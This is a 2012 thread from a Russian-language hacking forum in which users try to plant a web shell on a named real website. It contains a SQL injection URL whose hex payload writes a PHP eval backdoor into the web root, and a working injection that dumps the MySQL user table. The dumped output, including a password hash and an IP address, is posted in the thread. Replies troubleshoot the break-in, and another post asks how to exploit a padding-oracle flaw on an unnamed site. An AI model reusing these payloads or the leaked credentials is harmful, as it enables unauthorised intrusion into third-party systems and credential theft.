ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

02.03.2012, 12:08
|
|
Guest
Сообщений: n/a
Провел на форуме: 3380
Репутация:
0
|
|
Сообщение от Expl0ited
Expl0ited said:
линку в личку
Expl0ited, можно как-то шелл залить на тот сайт?
|
|
|
|

02.03.2012, 16:06
|
|
Guest
Сообщений: n/a
Провел на форуме: 344922
Репутация:
75
|
|
Подскажите как залить шелл, пробую так
Сообщение от None
http://k5.ru/m/all.php?id=12+limit+0,0+union+select+1,0x20273c3f7 06870206576616c286261736536345f6465636f646528245f5 24551554553545b636d645d29293b203f3e2720696e746f206 f757466696c6520272f7573722f6c6f63616c2f61706163686 5322f6874646f63732f6d2f7368656c6c2e706870272d2d,3--+
и не выходит, я может чтото делаю неправильно?
|
|
|
|

02.03.2012, 17:25
|
|
Guest
Сообщений: n/a
Провел на форуме: 107835
Репутация:
23
|
|
Сообщение от qaz
qaz said:
Подскажите как залить шелл, пробую так
и не выходит, я может чтото делаю неправильно?
Наверное, поэтому
http://k5.ru/m/all.php?id=12+and+1=0+union+select+1,(select(@x)fr om(select(@x:=0x00),(select(0)from(mysql.user)wher e(0x00)in(@x:=concat(@x,0x3c62723e,Host,0x3a,User, 0x3a,Password,0x3a,File_priv))))x),3+from+mysql.us er+--+
localhost:forks::Y
77.95.129.68:forks:*C232C307193E6E1B4C30CCD5017F10 EFC0CBD5FD:Y
|
|
|
|

02.03.2012, 17:27
|
|
Guest
Сообщений: n/a
Провел на форуме: 54576
Репутация:
8
|
|
Сообщение от qaz
qaz said:
Подскажите как залить шелл, пробую так
и не выходит, я может чтото делаю неправильно?
Если MySQL сервер работает под mysql то он скорее всего не будет иметь права для записи в www директорию http сервера. Максимально создаст файл в /var/lib/mysql/, а www сервер уж точно не будет запускать скрипти оттуда.
|
|
|
|

02.03.2012, 17:33
|
|
Guest
Сообщений: n/a
Провел на форуме: 344922
Репутация:
75
|
|
Сообщение от er9j6@
er9j6@ said:
Наверное, поэтому
http://k5.ru/m/all.php?id=12+and+1=0+union+select+1,(select(@x)fr om(select(@x:=0x00),(select(0)from(mysql.user)wher e(0x00)in(@x:=concat(@x,0x3c62723e,Host,0x3a,User, 0x3a,Password,0x3a,File_priv))))x),3+from+mysql.us er+--+
localhost:forks::Y
77.95.129.68:forks:*C232C307193E6E1B4C30CCD5017F10 EFC0CBD5FD:Y
а я не шарю что ето значит, подскажи
|
|
|
|

02.03.2012, 17:36
|
|
Guest
Сообщений: n/a
Провел на форуме: 107835
Репутация:
23
|
|
Сообщение от qaz
qaz said:
а я не шарю что ето значит, подскажи
ну, это значит что подключение к бд разрешено с определенных хостов
|
|
|
|

02.03.2012, 17:38
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от R0nin
R0nin said:
Если MySQL сервер работает под mysql то он скорее всего не будет иметь права для записи в www директорию http сервера. Максимально создаст файл в
/var/lib/mysql/
, а www сервер уж точно не будет запускать скрипти оттуда.
он будет иметь право для запеси в папки с правами 777, т.е где разрешены запеси для всех групп.
|
|
|

02.03.2012, 17:39
|
|
Новичок
Регистрация: 19.06.2008
Сообщений: 12
Провел на форуме: 30356
Репутация:
1
|
|
Приветствую.
Сканил Acunetix'ом один ресурс и он выдал мне следующее:
Сообщение от None
Acunetix detected this (ASP.NET Padding Oracle Vulnerability) vulnerability by comparing the HTTP response status and body for two different requests (one request when the padding is incorrect and another one where the encrypted text is not valid). If the body AND/OR status are different, this vulnerability can be exploited.
First request: Status code 404 Response body (first 500 bytes) ################ #### ############## (404) QRATOR HTTP 503 - application is too busy right now. ...
И приводит запрос, который выдает 404 и 503 ошибку. Я пытался его воспроизвести, но у меня получилась только 404 ошибка.
Сообщение от None
GET /WebResource.axd HTTP/1.1
Cookie: ASP.NET_SessionId=jqvbmouzqvyyng4534ofwa55
Host: ***.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
503-ю воспроизвести не могу. И интересует такой вопрос: насколько реально будет эксплуатировать данную уязвимость? Если вообще реально. Спасибо.
|
|
|

02.03.2012, 17:39
|
|
Guest
Сообщений: n/a
Провел на форуме: 195266
Репутация:
53
|
|
Сообщение от qaz
qaz said:
Подскажите как залить шелл, пробую так
и не выходит, я может чтото делаю неправильно?
1. там mq=on. Это делает невозможным заливку, потому что железно нужны кавычки.
2. нельзя переводить в хекс методы, операторы и т.п.
|
|
|
|

02.03.2012, 17:55
|
|
Guest
Сообщений: n/a
Провел на форуме: 29020
Репутация:
55
|
|
Сообщение от None
Если MySQL сервер работает под mysql то он скорее всего не будет иметь права для записи в www директорию http сервера. Максимально создаст файл в /var/lib/mysql/, а www сервер уж точно не будет запускать скрипти оттуда.
реально бред
Сообщение от None
ну, это значит что подключение к бд разрешено с определенных хостов
это тоже значение не имеет, к бд обращается сам скрипт, уж у него права на подключение есть
Melfis верно сказал Двойного запроса там тоже не видно, нужно другой способ искать, благо читалка там есть
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|